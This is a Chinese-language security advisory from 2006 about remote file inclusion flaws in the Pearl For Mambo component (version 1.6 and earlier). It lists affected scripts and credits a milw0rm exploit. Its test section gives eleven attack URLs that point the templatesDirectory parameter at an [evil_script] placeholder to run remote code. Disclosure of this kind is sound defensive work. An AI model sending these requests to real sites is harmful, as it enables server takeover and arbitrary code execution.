安全研究
安全漏洞
Pearl For Mambo多个远程文件包含漏洞
发布日期:2006-06-27
更新日期:2006-06-27
受影响系统:
Pearlinger Pearl For Mambo <= 1.6描述:
BUGTRAQ ID: 18690
Mambo是免费的功能强大的开放源码内容管理系统,Pearl For Mambo是可以无缝的集成于Mambo的一个组件。
Pearl For Mambo允许远程攻击者使用phpbb_root_path或GlobalSettings[templatesDirectory]参数向多个脚本发送特制的URL请求,导致指定远程系统的恶意文件,在有漏洞的系统上执行任意代码。
以下脚本受这个漏洞影响:
includes/functions_cms.php
includes/adminSensored.php
includes/adminBoards.php
includes/adminAttachments.php
includes/adminAvatars.php
includes/adminBackupdatabase.php
includes/adminBanned.php
includes/adminForums.php
includes/adminPolls.php
includes/adminSmileys.php
includes/poll.php
includes/move.php
<*来源:Kw3rLn (ciriboflacs@YaHoo.Com)
链接:http://www.milw0rm.com/exploits/1956
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]
建议:
厂商补丁:
Pearlinger
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.pearlinger.com/
浏览次数:3159
严重程度:0(网友投票)
绿盟科技给您安全的保障